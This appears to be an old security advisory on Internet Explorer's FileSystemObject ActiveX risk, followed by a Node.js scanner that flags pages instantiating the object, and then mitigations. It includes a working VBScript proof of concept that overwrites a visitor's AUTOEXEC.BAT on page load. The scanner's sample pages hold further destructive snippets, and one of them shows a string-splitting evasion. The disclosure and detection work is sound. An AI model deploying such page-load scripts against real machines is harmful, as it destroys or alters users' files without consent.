COMMAND
ActiveX (FileSystemObject)
SYSTEMS AFFECTED
Windows systems running Internet Explorer with the security level
set to LOW, or to a custom level that allows scripting of ActiveX
controls not marked safe for scripting
PROBLEM
Frank Luzsicza found the following. While researching the ActiveX
object FileSystemObject he came across some disturbing results.
Its presence on a client workstation may allow a server-side
hypertext web page to direct malicious file manipulation on the
client.
The FileSystemObject (ProgID Scripting.FileSystemObject, part of
the Scripting Runtime, scrrun.dll) exposes file manipulation on
the "wintel" platforms through a series of KERNEL APIs wrapped in
a handful of object methods, such as OpenTextFile(), DeleteFile()
and the Read(), ReadAll(), Write() ...etc. methods of the text
streams it returns. The object does not have to be delivered by
the server: it is already installed on the client together with
the scripting runtime used by IE and the Windows Scripting Host.
A web page only needs client-side script (VBScript, JScript,
...etc.) that instantiates it with CreateObject() or
new ActiveXObject(); that script then manipulates the client's
file system with the privileges of the logged-on user. The
FileSystemObject is not marked "safe for scripting", so IE will
only instantiate it from a web page when the security settings of
the zone the page falls into permit scripting of unsafe controls.
Tested environments:
Server: Microsoft IIS 4.0 from the NT Option Pack 4.0 SP 4.0
Client: Any "wintel" machine running Internet Explorer 3.X, 4.0, 5.0.
A real-world example probably explains this best. Suppose you
wanted to write the line "@echo HELLO FRIEND !" into the
AUTOEXEC.BAT of every person who visited your web page. This can
be achieved using the FileSystemObject ActiveX control. The web
site residing on MS IIS only needs to contain a DEFAULT.HTML (not
even an ASP is necessary):
<!-- Sample Code - START -->
<SCRIPT LANGUAGE="VBScript">
' Runs on the client with the privileges of the logged-on user.
Public Sub OnLoad_Sub()
    ' IOMode 2 = ForWriting: the file is opened for writing and
    ' truncated, so the existing AUTOEXEC.BAT contents are lost.
    Const ForWriting = 2, FILE_NAME = "c:\autoexec.bat"
    Dim fso, f
    ' Instantiate the locally installed Scripting Runtime object.
    Set fso = CreateObject("Scripting.FileSystemObject")
    Set f = fso.OpenTextFile(FILE_NAME, ForWriting)
    f.Write "@echo HELLO FRIEND !"
    f.Close
End Sub
</SCRIPT>
<!-- Sample Code - END -->
To execute this code on the client side, the web page must call
the procedure, for instance from the ONLOAD handler of the BODY
tag:
<BODY ONLOAD="OnLoad_Sub()">
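As an added example, not part of Frank Luzsicza's advisory, the
following JavaScript (Node.js) is a content-filter style scanner
that flags pages attempting to instantiate the FileSystemObject
from client-side script: the VBScript CreateObject() form shown
above, the JScript new ActiveXObject() form, and an <OBJECT>
tag referencing the object's CLSID. The sample pages, pattern
names, severities and the verdict() policy are constructed for
this example; the CLSID is the one under which scrrun.dll
registers FileSystemObject and should be checked against
HKEY_CLASSES_ROOT\CLSID on your own build.

```javascript
// Added example: scanner for web pages that try to instantiate
// Scripting.FileSystemObject from client-side script. Not part of the
// advisory; the sample pages below are constructed for this example.

// CLSID under which scrrun.dll registers FileSystemObject (verify against
// HKEY_CLASSES_ROOT\CLSID on the target build).
const FSO_CLSID = "0D43FE01-F093-11CF-8940-00A0C9054228";

// Strong indicators: an instantiation of the object, or a call to one of
// its file-manipulating methods. VBScript statement-form calls without
// parentheses (fso.DeleteFile "c:\x") are matched by allowing a quote
// directly after the method name.
const STRONG = [
  { name: "vbscript-createobject",
    re: /CreateObject\s*\(\s*["']Scripting\.FileSystemObject["']\s*\)/i },
  { name: "jscript-activexobject",
    re: /new\s+ActiveXObject\s*\(\s*["']Scripting\.FileSystemObject["']\s*\)/i },
  { name: "object-tag-clsid",
    re: new RegExp("clsid:\\s*\\{?" + FSO_CLSID + "\\}?", "i") },
  { name: "fso-file-method",
    re: /\.(OpenTextFile|CreateTextFile|DeleteFile|DeleteFolder|CopyFile|MoveFile|CreateFolder)\s*[("]/i },
];

// Weak indicator: the ProgID's name inside a <SCRIPT> block on a line that
// matched nothing above, e.g. CreateObject("Scripting." & "FileSystemObject").
// Splitting the word itself ("File" & "SystemObject") still evades this:
// the scanner is a screen, not a replacement for the browser zone setting.
const WEAK_FRAGMENT = /FileSystemObject/i;

// Returns [{line, pattern, severity, snippet}] for every hit, in line order.
function scanHtml(html) {
  const findings = [];
  let inScript = false;
  html.split(/\r?\n/).forEach((text, idx) => {
    const line = idx + 1;
    if (/<script\b/i.test(text)) inScript = true;
    let strongHit = false;
    for (const p of STRONG) {
      if (p.re.test(text)) {
        findings.push({ line, pattern: p.name, severity: "high", snippet: text.trim() });
        strongHit = true;
      }
    }
    if (inScript && !strongHit && WEAK_FRAGMENT.test(text)) {
      findings.push({ line, pattern: "progid-fragment", severity: "low", snippet: text.trim() });
    }
    if (/<\/script\s*>/i.test(text)) inScript = false;
  });
  return findings;
}

// Policy: any strong indicator blocks the page; weak ones queue it for review.
function verdict(findings) {
  if (findings.some((f) => f.severity === "high")) return "block";
  return findings.length > 0 ? "review" : "allow";
}

// Constructed sample pages (not captured from any real site).
const SAMPLE_VBSCRIPT = [
  '<HTML><BODY ONLOAD="OnLoad_Sub()">',
  '<SCRIPT LANGUAGE="VBScript">',
  "Public Sub OnLoad_Sub()",
  '  Const ForWriting = 2, FILE_NAME = "c:\\autoexec.bat"',
  "  Dim fso, f",
  '  Set fso = CreateObject("Scripting.FileSystemObject")',
  "  Set f = fso.OpenTextFile(FILE_NAME, ForWriting)",
  '  f.Write "@echo HELLO FRIEND !"',
  "  f.Close",
  "End Sub",
  "</SCRIPT></BODY></HTML>",
].join("\n");
const SAMPLE_JSCRIPT = [
  "<HTML><BODY>",
  '<SCRIPT LANGUAGE="JScript">',
  'var fso = new ActiveXObject("Scripting.FileSystemObject");',
  'fso.DeleteFile("c:\\autoexec.bat");',
  "</SCRIPT>",
  "</BODY></HTML>",
].join("\n");
const SAMPLE_OBJECT = [
  '<OBJECT ID="fso" CLASSID="clsid:0D43FE01-F093-11CF-8940-00A0C9054228"></OBJECT>',
  '<SCRIPT LANGUAGE="VBScript">',
  'Set f = fso.CreateTextFile("c:\\owned.txt")',
  'f.WriteLine "created from a web page"',
  "</SCRIPT>",
].join("\n");
const SAMPLE_EVASION = [
  '<SCRIPT LANGUAGE="VBScript">',
  'Set fso = CreateObject("Scripting." & "FileSystemObject")',
  'Set drv = fso.GetDrive("c:")',
  "document.write drv.FreeSpace",
  "</SCRIPT>",
].join("\n");
const SAMPLE_BENIGN = [
  "<HTML><BODY>",
  "<P>The FileSystemObject is documented in the Scripting Runtime reference.</P>",
  '<SCRIPT LANGUAGE="JavaScript">document.write("hello")</SCRIPT>',
  "</BODY></HTML>",
].join("\n");

const SAMPLES = { vbscript: SAMPLE_VBSCRIPT, jscript: SAMPLE_JSCRIPT,
  object: SAMPLE_OBJECT, evasion: SAMPLE_EVASION, benign: SAMPLE_BENIGN };
for (const [name, page] of Object.entries(SAMPLES)) {
  const f = scanHtml(page);
  console.log(name, verdict(f), f.map((x) => x.line + ":" + x.pattern).join(" "));
}
```

The evasion sample shows the limit of string matching: the split
ProgID and a non-destructive method (GetDrive) only reach the
weak heuristic, so the page is queued for review rather than
blocked. A scanner like this belongs in front of a mail gateway or
proxy as an extra screen; the real control is the browser's zone
setting described under SOLUTION.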
SOLUTION
All IE web browsers should have their security level for the
Internet zone set to at least MEDIUM (the default in IE 4.0 and
5.0). At MEDIUM the option "Initialize and script ActiveX controls
not marked as safe for scripting" is disabled, and since the
FileSystemObject is not marked safe, CreateObject(
"Scripting.FileSystemObject") from a web page fails. Note that
this is not a download issue: the object is already installed on
the client, so settings that only block the download of signed or
unsigned controls do not help. Check the Local Intranet and
Trusted Sites zones as well, since pages in those zones run with
weaker settings, and be aware that HTML opened from the local
disk (for instance a saved mail attachment) is not subject to the
Internet zone restrictions at all. On workstations that do not
need the object, unregistering scrrun.dll (regsvr32 /u
scrrun.dll) removes it entirely, at the cost of breaking WSH
scripts and local ASP applications that depend on it.